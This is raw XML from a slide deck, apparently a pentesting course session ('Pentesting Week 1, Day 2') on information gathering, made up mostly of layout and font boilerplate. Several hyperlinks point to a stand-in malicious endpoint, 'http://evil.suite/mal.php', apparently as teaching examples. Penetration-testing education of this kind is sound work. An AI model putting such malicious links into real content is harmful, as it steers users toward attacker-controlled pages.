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8" r:id="rId3"/>
    <p:sldMasterId id="21474837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Thin"/>
      <p:regular r:id="rId43"/>
      <p:bold r:id="rId44"/>
      <p:italic r:id="rId45"/>
      <p:boldItalic r:id="rId46"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Mono Medium"/>
      <p:regular r:id="rId47"/>
      <p:bold r:id="rId48"/>
      <p:italic r:id="rId49"/>
      <p:boldItalic r:id="rId50"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Medium"/>
      <p:regular r:id="rId51"/>
      <p:bold r:id="rId52"/>
      <p:italic r:id="rId53"/>
      <p:boldItalic r:id="rId54"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto"/>
      <p:regular r:id="rId55"/>
      <p:bold r:id="rId56"/>
      <p:italic r:id="rId57"/>
      <p:boldItalic r:id="rId58"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Mono Light"/>
      <p:regular r:id="rId59"/>
      <p:bold r:id="rId60"/>
      <p:italic r:id="rId61"/>
      <p:boldItalic r:id="rId62"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Light"/>
      <p:regular r:id="rId63"/>
      <p:bold r:id="rId64"/>
      <p:italic r:id="rId65"/>
      <p:boldItalic r:id="rId66"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Mon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Thin-bold.fntdata"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoThin-regular.fntdata"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoThin-boldItalic.fntdata"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoThin-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MonoMedium-bold.fntdata"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMonoMedium-regular.fntdata"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMono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RobotoMon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Light-boldItalic.fntdata"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMonoLight-italic.fntdata"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide15.xml"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoLight-bold.fntdata"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoLight-regular.fntdata"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide17.xml"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoLight-boldItalic.fntdata"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide16.xml"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoLight-italic.fntdata"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide19.xml"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMono-bold.fntdata"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide18.xml"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMono-regular.fntdata"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMonoLight-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edium-regular.fntdata"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMonoMedium-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font" Target="fonts/RobotoMedium-boldItalic.fntdata"/><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RobotoMonoLight-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5" name="Shape 2025"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2026" name="Google Shape;202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9" name="Shape 2119"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2120" name="Google Shape;2120;g5bbe20bd8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5bbe20bd8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Google Shape;2130;g5bbe20bd8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1" name="Google Shape;2131;g5bbe20bd8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0" name="Shape 2140"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2141" name="Google Shape;2141;g5bbe20bd8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5bbe20bd8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Google Shape;2149;g526903d1f6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526903d1f6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0" name="Shape 2160"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2161" name="Google Shape;2161;g5bbe20bd8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5bbe20bd8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9" name="Shape 2169"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2170" name="Google Shape;2170;g5bbe20bd8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5bbe20bd8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9" name="Shape 2179"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2180" name="Google Shape;2180;g5bbe20bd8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5bbe20bd8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9" name="Shape 2189"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2190" name="Google Shape;2190;g5bbe20bd8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5bbe20bd8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9" name="Shape 2199"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2200" name="Google Shape;2200;g526903d1f6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526903d1f6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7" name="Shape 2207"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2208" name="Google Shape;2208;g526903d1f6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526903d1f6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2" name="Shape 2032"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2033" name="Google Shape;2033;g5297670f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5297670f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4" name="Shape 2214"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2215" name="Google Shape;2215;g5bbe20bd8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5bbe20bd8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2" name="Shape 2222"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2223" name="Google Shape;2223;g5bbe20bd8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5bbe20bd8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1" name="Shape 2231"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2232" name="Google Shape;2232;g5bbe20bd8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5bbe20bd8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Google Shape;2241;g5bbe20bd8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5bbe20bd8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9" name="Shape 2249"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2250" name="Google Shape;2250;g5bbe20bd8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5bbe20bd8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8" name="Shape 2258"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2259" name="Google Shape;2259;g5bbe20bd8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5bbe20bd8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5bbe20bd8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5bbe20bd8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6" name="Shape 2276"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2277" name="Google Shape;2277;g5bbe20bd8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5bbe20bd8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1" name="Shape 2281"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2282" name="Google Shape;2282;g51e3c04b9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51e3c04b9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0" name="Shape 2290"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2291" name="Google Shape;2291;g526903d1f6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526903d1f6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Google Shape;2045;g5297670f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5297670f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7" name="Shape 2297"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2298" name="Google Shape;2298;g5bbe20bd8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5bbe20bd8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7" name="Shape 2307"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2308" name="Google Shape;2308;g5bbe20bd8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5bbe20bd8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8" name="Shape 2318"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2319" name="Google Shape;2319;g5bbe20bd8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5bbe20bd8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0" name="Shape 2330"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2331" name="Google Shape;2331;g5bbe20bd8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5bbe20bd8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3" name="Shape 2343"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2344" name="Google Shape;2344;g5bbe20bd80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5bbe20bd80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2" name="Shape 2352"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2353" name="Google Shape;2353;g5bbe20bd8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4" name="Google Shape;2354;g5bbe20bd8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0" name="Shape 2360"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2361" name="Google Shape;2361;g526903d1f6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526903d1f6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7" name="Shape 2367"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2368" name="Google Shape;2368;g5bbe20bd80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5bbe20bd80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7" name="Shape 2057"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2058" name="Google Shape;2058;g51d59e258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51d59e258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8" name="Shape 2068"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2069" name="Google Shape;2069;g526903d1f6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526903d1f6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g5bbe20bd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5bbe20bd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7" name="Shape 2087"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2088" name="Google Shape;2088;g5bbe20bd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5bbe20bd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7" name="Shape 2097"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2098" name="Google Shape;2098;g5bbe20bd8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5bbe20bd8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8" name="Shape 2108"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2109" name="Google Shape;2109;g5bbe20bd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5bbe20bd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1.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1.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39.png"/><Relationship Id="rId5"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0.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4.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66.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image38.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50.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5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87.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9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3.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65.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image70.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7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99.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image72.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image75.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image77.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image76.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7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3.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81.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image92.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image90.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image83.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image86.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image88.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8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100.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image97.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image95.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image91.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image94.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image98.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9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0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101.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10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101.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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101.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10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101.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10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7.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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7.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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32.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11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2.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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4.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image12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208.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image134.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image136.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image13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38.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image137.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image139.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14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43.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image137.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image142.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image144.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image146.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15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50.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15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52.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image162.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15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8.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image161.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16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3.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image159.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image165.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image211.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image186.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16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68.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image198.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16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0.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image173.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image171.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image169.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image172.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image175.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17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4.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1.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image182.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image176.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17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8.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image18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1.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image190.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image187.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image193.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image192.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image189.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image196.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image19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4.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image197.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image203.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image200.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image199.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image204.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image202.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20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9.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20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3" name="Google Shape;2023;p10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theme" Target="../theme/theme1.xml"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout100.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hyperlink" Target="http://evil.suite/mal.ph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hyperlink" Target="http://evil.suite/mal.php"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evil.suite/mal.ph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hyperlink" Target="http://evil.suite/mal.ph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hyperlink" Target="http://evil.suite/mal.php"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heartbleed.co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8" name="Shape 2028"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2029" name="Google Shape;2029;p10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Pentesting Week 1, Day 2</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2030" name="Google Shape;2030;p103"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274350" y="16002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Information Gathering and</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
